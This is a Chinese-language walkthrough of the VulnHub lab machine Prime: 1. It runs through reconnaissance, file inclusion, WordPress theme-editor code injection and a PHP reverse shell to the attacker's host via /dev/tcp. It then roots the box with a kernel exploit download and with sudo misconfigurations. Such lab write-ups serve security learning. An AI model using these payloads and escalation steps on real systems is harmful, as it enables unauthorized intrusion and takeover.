PRIME: 1
https://www.vulnhub.com/entry/prime-1,358/
主机发现
# yunki @ yunki in ~/vulnhub/holynix [20:08:21] C:1
$ nmap -sn 192.168.54.0/24
Nmap scan report for 192.168.54.13
Host is up (0.00050s latency).
nmap扫描
# yunki @ yunki in ~/vulnhub [20:08:25]
$ sudo nmap --min-rate 10000 -p- 192.168.54.13
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 00:0C:29:EB:A5:7C (VMware)
# yunki @ yunki in ~/vulnhub[20:15:59]
$ sudo nmap -sT -sV -O -p22,80 192.168.54.13
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
MAC Address: 00:0C:29:EB:A5:7C (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
# yunki @ yunki in ~/vulnhub[20:16:27]
$ sudo nmap -sU -p22,80 192.168.54.13
PORT STATE SERVICE
22/udp closed ssh
80/udp closed http
MAC Address: 00:0C:29:EB:A5:7C (VMware)
# yunki @ yunki in ~/vulnhub[20:16:33]
$ sudo nmap --script=vuln -p22,80 192.168.54.13
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
|_http-csrf: Couldn't find any CSRF vulnerabilities.
| http-slowloris-check:
| VULNERABLE:
| Slowloris DOS attack
| State: LIKELY VULNERABLE
| IDs: CVE:CVE-2007-6750
| Slowloris tries to keep many connections to the target web server open and hold
| them open as long as possible. It accomplishes this by opening connections to
| the target web server and sending a partial request. By doing so, it starves
| the http server's resources causing Denial Of Service.
|
| Disclosure date: 2009-09-17
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
|_ http://ha.ckers.org/slowloris/
| http-enum:
| /wordpress/: Blog
|_ /wordpress/wp-login.php: Wordpress login page.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
MAC Address: 00:0C:29:EB:A5:7C (VMware)
web渗透
# yunki @ yunki in ~/vulnhub/Prime1 [12:03:22]
$ gobuster dir --url http://192.168.54.13 --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.54.13
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Timeout: 10s
===============================================================
2023/03/19 12:04:49 Starting gobuster in directory enumeration mode
===============================================================
/wordpress (Status: 301) [Size: 318] [--> http://192.168.54.13/wordpress/]
/dev (Status: 200) [Size: 131]
/javascript (Status: 301) [Size: 319] [--> http://192.168.54.13/javascript/]
/server-status (Status: 403) [Size: 301]
===============================================================
2023/03/19 12:06:04 Finished
===============================================================
更深层次的挖掘?那就指定一下扩展名试试。
# yunki @ yunki in ~/vulnhub/Prime1 [12:28:39]
$ gobuster dir --url http://192.168.54.13 --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x php,html,txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.54.13
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Extensions: txt,php,html
[+] Timeout: 10s
===============================================================
2023/03/19 12:28:42 Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 278]
/.html (Status: 403) [Size: 278]
/index.php (Status: 200) [Size: 136]
/image.php (Status: 200) [Size: 147]
/wordpress (Status: 301) [Size: 318] [--> http://192.168.54.13/wordpress/]
/dev (Status: 200) [Size: 131]
/javascript (Status: 301) [Size: 319] [--> http://192.168.54.13/javascript/]
/secret.txt (Status: 200) [Size: 412]
/.php (Status: 403) [Size: 278]
/.html (Status: 403) [Size: 278]
/server-status (Status: 403) [Size: 278]
===============================================================
2023/03/19 12:30:46 Finished
===============================================================
提示我去https://github.com/hacknpentest/Fuzzing/blob/master/Fuzz_For_Web,发现了这个command
wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt --hc 404 http://website.com/secret.php?FUZZ=something,修改一下内容运行。
# yunki @ yunki in ~/vulnhub/Prime1 [12:39:58]
$ wfuzz -c -w /usr/share/wfuzz/wordlist/general/common.txt --hh 136 http://192.168.54.13/\?FUZZ\=something
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://192.168.54.13/?FUZZ=something
Total requests: 951
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000341: 200 7 L 19 W 206 Ch "file"
Total time: 1.329935
Processed Requests: 951
Filtered Requests: 950
Requests/sec.: 715.0721
结合secret.txt内容,和扫描出来的file参数,构造urlhttp://192.168.54.13/?file=location.txt并访问,发现
这里,需要使用secrettier360在其他的php页面上继续挖掘,这里我们回到目录爆破那,发现只有index.php和image.php,刚才的是index.php,那这里用image.php试一试。http://192.168.54.13/image.php?secrettier360
提示找到了正确的参数,那可以干嘛呢,刚刚的file参数可以文件包含,那这里可以吗,试一试。
那就再去包含一下这个文件。
发现密码follow_the_ippsec,那这里是什么密码呢?而且在saket home目录下? 尝试ssh,发现不正确。
那就去看看wordpress有没有什么其他的漏洞。使用wpscan扫描一下cms。
# yunki @ yunki in ~/vulnhub/Prime1 [12:59:39]
$ wpscan --url http://192.168.54.13/wordpress -e u
[+] victor
| Found By: Author Posts - Display Name (Passive Detection)
| Confirmed By:
| Rss Generator (Passive Detection)
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
# yunki @ yunki in ~/vulnhub/Prime1 [13:02:54]
$ gobuster dir --url http://192.168.54.13/wordpress --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://192.168.54.13/wordpress
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Timeout: 10s
===============================================================
2023/03/19 13:03:17 Starting gobuster in directory enumeration mode
===============================================================
/wp-content (Status: 301) [Size: 329] [--> http://192.168.54.13/wordpress/wp-content/]
/wp-includes (Status: 301) [Size: 330] [--> http://192.168.54.13/wordpress/wp-includes/]
/wp-admin (Status: 301) [Size: 327] [--> http://192.168.54.13/wordpress/wp-admin/]
===============================================================
2023/03/19 13:03:43 Finished
===============================================================
进到管理员界面,输入用户和刚刚得到的密码victor:follow_the_ippsec,发现可以登录进来。那就阅读一下cms。
找到appearance,里面的theme editor发现可以编辑php代码,那就写入反弹shell:
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/192.168.54.128/443 0>&1'");?>,开启监听。
那在哪访问呢?通过阅读源码,可以找到路径。
http://192.168.54.13/wordpress/wp-content/themes/twentynineteen/secret.php
获得初始shell
# yunki @ yunki in ~ [12:58:14] C:130
$ sudo nc -lvnp 443
listening on [any] 443 ...
connect to [192.168.54.128] from (UNKNOWN) [192.168.54.13] 53350
bash: cannot set terminal process group (1367): Inappropriate ioctl for device
bash: no job control in this shell
www-data@ubuntu:/var/www/html/wordpress/wp-content/themes/twentynineteen$ whoami
<ml/wordpress/wp-content/themes/twentynineteen$ whoami
www-data
www-data@ubuntu:/var/www/html/wordpress/wp-content/themes/twentynineteen$ ip a
<ml/wordpress/wp-content/themes/twentynineteen$ ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:0c:29:eb:a5:7c brd ff:ff:ff:ff:ff:ff
inet 192.168.54.13/24 brd 192.168.54.255 scope global dynamic ens33
valid_lft 1609sec preferred_lft 1609sec
inet6 fe80::57e8:dc54:3bcd:712a/64 scope link
valid_lft forever preferred_lft forever
权限提升
方法一:内核提权
www-data@ubuntu:/var/www/html/wordpress/wp-content/themes/twentynineteen$ uname -a
-aame
Linux ubuntu 4.10.0-28-generic #32~16.04.2-Ubuntu SMP Thu Jul 20 10:19:48 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
www-data@ubuntu:/var/www/html/wordpress/wp-content/themes/twentynineteen$ uname -r
-rame
4.10.0-28-generic
使用内核漏洞进行权限提升
# yunki @ yunki in ~/vulnhub/Prime1 [13:26:54]
$ searchsploit Linux ubuntu 4.10 | grep -i "privilege escalation"
Apport (Ubuntu 14.04/14.10/15.04) - Race Condition Privilege Escalation | linux/local/37088.c
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation | linux/local/37292.c
Linux Kernel 3.13.0 < 3.19 (Ubuntu 12.04/14.04/14.10/15.04) - 'overlayfs' Local Privilege Escalation (Access /etc/sh | linux/local/37293.txt
Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation | linux/local/45010.c
Ubuntu < 15.10 - PT Chown Arbitrary PTs Access Via User Namespace Privilege Escalation | linux/local/41760.txt
usb-creator 0.2.x (Ubuntu 12.04/14.04/14.10) - Local Privilege Escalation | linux/local/36820.txt
通过几番尝试,选择45010.c
kali
# yunki @ yunki in ~/vulnhub/Prime1 [13:29:15]
$ searchsploit -m 45010.c
Exploit: Linux Kernel < 4.13.9 (Ubuntu 16.04 / Fedora 27) - Local Privilege Escalation
URL: https://www.exploit-db.com/exploits/45010
Path: /usr/share/exploitdb/exploits/linux/local/45010.c
File Type: C source, ASCII text, with CRLF line terminators
Copied to: /home/yunki/vulnhub/Prime1/45010.c
# yunki @ yunki in ~/vulnhub/Prime1 [13:29:21]
$ php -S 0:80
[Sun Mar 19 13:29:26 2023] PHP 7.4.15 Development Server (http://0:80) started
靶机
www-data@ubuntu:/var/www/html/wordpress/wp-content/themes/twentynineteen$ cd /tmp
www-data@ubuntu:/tmp$ wget http://192.168.54.128/45010.c
wget http://192.168.54.128/45010.c
--2023-03-18 22:30:12-- http://192.168.54.128/45010.c
Connecting to 192.168.54.128:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 13728 (13K) [text/x-c]
Saving to: '45010.c'
0K .......... ... 100% 227M=0s
2023-03-18 22:30:12 (227 MB/s) - '45010.c' saved [13728/13728]
www-data@ubuntu:/tmp$ gcc 45010.c -o 45010
gcc 45010.c -o 45010
www-data@ubuntu:/tmp$ chmod +x 45010
chmod +x 45010
www-data@ubuntu:/tmp$ ./45010
./45010
whoami
root
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:0c:29:eb:a5:7c brd ff:ff:ff:ff:ff:ff
inet 192.168.54.13/24 brd 192.168.54.255 scope global dynamic ens33
valid_lft 1561sec preferred_lft 1561sec
inet6 fe80::57e8:dc54:3bcd:712a/64 scope link
valid_lft forever preferred_lft forever
方法二:openssl解密提权
www-data@ubuntu:/var/www$ sudo -l
sudo -l
Matching Defaults entries for www-data on ubuntu:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on ubuntu:
(root) NOPASSWD: /home/saket/enc
发现enc文件是root权限执行,尝试运行,发现需要输入密码,用之前获取到的密码,发现不对,这里就需要找系统里的备用密码。
www-data@ubuntu:/home/saket$ ./enc
./enc
enter password: follow_the_ippsec
那我们就开始寻找吧,查找备份密码文件。(一步一步才找到这个*backup*pass,一开始搜的是backup,pass,慢慢才找到的)
www-data@ubuntu:/home/saket$ find / -name "*backup*pass" 2>/dev/null
find / -name "*backup*pass" 2>/dev/null
/opt/backup/server_database/backup_pass
www-data@ubuntu:/home/saket$ cat /opt/backup/server_database/backup_pass
cat /opt/backup/server_database/backup_pass
your password for backup_database file enc is
"backup_password"
Enjoy!
找到了备份密码,backup_password,再去运行。
www-data@ubuntu:/var/www$ sudo /home/saket/enc
sudo /home/saket/enc
enter password: backup_password
good
www-data@ubuntu:/var/www$ cd /home/saket
cd /home/saket
www-data@ubuntu:/home/saket$ ls
ls
enc
enc.txt
key.txt
password.txt
user.txt
发现该enc执行,生成了几个文件。
www-data@ubuntu:/home/saket$ cat enc.txt
cat enc.txt
nzE+iKr82Kh8BOQg0k/LViTZJup+9DReAsXd/PCtFZP5FHM7WtJ9Nz1NmqMi9G0i7rGIvhK2jRcGnFyWDT9MLoJvY1gZKI2xsUuS3nJ/n3T1Pe//4kKId+B3wfDW/TgqX6Hg/kUj8JO08wGe9JxtOEJ6XJA3cO/cSna9v3YVf/ssHTbXkb+bFgY7WLdHJyvF6lD/wfpY2ZnA1787ajtm+/aWWVMxDOwKuqIT1ZZ0Nw4=
www-data@ubuntu:/home/saket$ cat key.txt
cat key.txt
I know you are the fan of ippsec.
So convert string "ippsec" into md5 hash and use it to gain yourself in your real form.
这里需要想到openssl。这里阅读key.txt可以看出,能通过ippsec获得saket的密码。
# 先把ippsec改成md5吧
www-data@ubuntu:/home/saket$ echo -n "ippsec" | md5sum
echo -n "ippsec" |md5sum
366a74cb3c959de17d61db30591c39d1 -
# 这里的-n是不输出最后的换行符,然后使用md5生成hash
www-data@ubuntu:/home/saket$ echo -n "ippsec" | md5sum | awk -F' ' '{print $1}'
echo -n "ippsec" | md5sum | awk -F' ' '{print $1}'
366a74cb3c959de17d61db30591c39d1
# 使用awk获取前面一串hash,去除掉‘-’
# 然后最后的指令里的CipherType获取,也就是对enc里的字符进行解密处理,先获取所有的解密种类
# 使用shell指令
# awk '{gsub(/ /,"\n");print}' CipherTypeRaw | sort | uniq > CipherType
$ cat CipherTypeRaw
aes-128-cbc aes-128-ecb aes-192-cbc aes-192-ecb
aes-256-cbc aes-256-ecb base64 bf
bf-cbc bf-cfb bf-ecb bf-ofb
camellia-128-cbc camellia-128-ecb camellia-192-cbc camellia-192-ecb
camellia-256-cbc camellia-256-ecb cast cast-cbc
cast5-cbc cast5-cfb cast5-ecb cast5-ofb
des des-cbc des-cfb des-ecb
des-ede des-ede-cbc des-ede-cfb des-ede-ofb
des-ede3 des-ede3-cbc des-ede3-cfb des-ede3-ofb
des-ofb des3 desx rc2
rc2-40-cbc rc2-64-cbc rc2-cbc rc2-cfb
rc2-ecb rc2-ofb rc4 rc4-40
seed seed-cbc seed-cfb seed-ecb
seed-ofb
$ cat CipherType
aes-128-cbc
aes-128-ecb
aes-192-cbc
aes-192-ecb
aes-256-cbc
...skip...
# 然后是对-K参数的处理,这里其实就是之前的key.txt的ippsec进行md5哈希之后的值进行hex转换,才能使用。
# yunki @ yunki in ~/vulnhub/Prime1 [17:12:35]
$ echo -n "ippsec" | md5sum | awk -F' ' '{print $1}' | tr -d '\n' | od -A n -t x1 | tr -d '\n' | tr -d ' '
3336366137346362336339353964653137643631646233303539316333396431
-
# 然后使用bash脚本遍历所有CipherType
# yunki @ yunki in ~/vulnhub/Prime1 [17:21:46] C:130
$ for Cipher in $(cat CipherType);do echo 'nzE+iKr82Kh8BOQg0k/LViTZJup+9DReAsXd/PCtFZP5FHM7WtJ9Nz1NmqMi9G0i7rGIvhK2jRcGnFyWDT9MLoJvY1gZKI2xsUuS3nJ/n3T1Pe//4kKId+B3wfDW/TgqX6Hg/kUj8JO08wGe9JxtOEJ6XJA3cO/cSna9v3YVf/ssHTbXkb+bFgY7WLdHJyvF6lD/wfpY2ZnA1787ajtm+/aWWVMxDOwKuqIT1ZZ0Nw4=' | openssl enc -d -a -$Cipher -K 3336366137346362336339353964653137643631646233303539316333396431 2>/dev/null ;echo $Cipher;done
Dont worry saket one day we will reach to
our destination very soon. And if you forget
your username then use your old password
==> "tribute_to_ippsec"
Victor,aes-256-ecb
# 发现是aes-256-ecb 直接用这个试试,验证成功
# yunki @ yunki in ~/vulnhub/Prime1 [17:23:26]
$ echo 'nzE+iKr82Kh8BOQg0k/LViTZJup+9DReAsXd/PCtFZP5FHM7WtJ9Nz1NmqMi9G0i7rGIvhK2jRcGnFyWDT9MLoJvY1gZKI2xsUuS3nJ/n3T1Pe//4kKId+B3wfDW/TgqX6Hg/kUj8JO08wGe9JxtOEJ6XJA3cO/cSna9v3YVf/ssHTbXkb+bFgY7WLdHJyvF6lD/wfpY2ZnA1787ajtm+/aWWVMxDOwKuqIT1ZZ0Nw4=' | openssl enc -d -a -aes-256-ecb -K 3336366137346362336339353964653137643631646233303539316333396431
Dont worry saket one day we will reach to
our destination very soon. And if you forget
your username then use your old password
==> "tribute_to_ippsec"
Victor,
这里获取到saket的密码了tribute_to_ippsec,使用ssh进行连接试试,发现连接成功。
# yunki @ yunki in ~/vulnhub/Prime1 [17:25:29]
$ ssh saket@192.168.54.133
saket@192.168.54.133's password:
$ whoami
saket
# 由于shell交互性不是很好,先使用dpkg -l | grep python查看是否安装pyhton,提升体验
$ dpkg -l | grep python
# 发现安装了python,直接使用
$ python -c "import pty;pty.spawn('/bin/bash')"
# 目前还不是系统权限,直接sudo -l查看权限,
saket@ubuntu:~$ sudo -l
Matching Defaults entries for saket on ubuntu:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User saket may run the following commands on ubuntu:
(root) NOPASSWD: /home/victor/undefeated_victor
查看到root权限执行不用密码执行/home/victor/undefeated_victor,直接执行
saket@ubuntu:~$ sudo /home/victor/undefeated_victor
if you can defeat me then challenge me in front of you
/home/victor/undefeated_victor: 2: /home/victor/undefeated_victor: /tmp/challenge: not found
显示没有找到/tmp/challenge,那我们就创建一个challenge文件夹
将/bin/bash放入,给他执行权限,重新运行
saket@ubuntu:~# echo '/bin/bash' > /tmp/challenge
saket@ubuntu:~# chmod +x /tmp/challenge
saket@ubuntu:~# sudo /home/victor/undefeated_victor
if you can defeat me then challenge me in front of you
# 查看用户
root@ubuntu:~# whoami
root
root@ubuntu:~# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: ens33: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000
link/ether 00:0c:29:a3:4e:00 brd ff:ff:ff:ff:ff:ff
inet 192.168.54.133/24 brd 192.168.54.255 scope global dynamic ens33
valid_lft 1546sec preferred_lft 1546sec
inet6 fe80::19c2:ba54:6756:9273/64 scope link
valid_lft forever preferred_lft forever
root@ubuntu:~# cat /root/root.txt
b2b17036da1de94cfb024540a8e7075a
1168
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
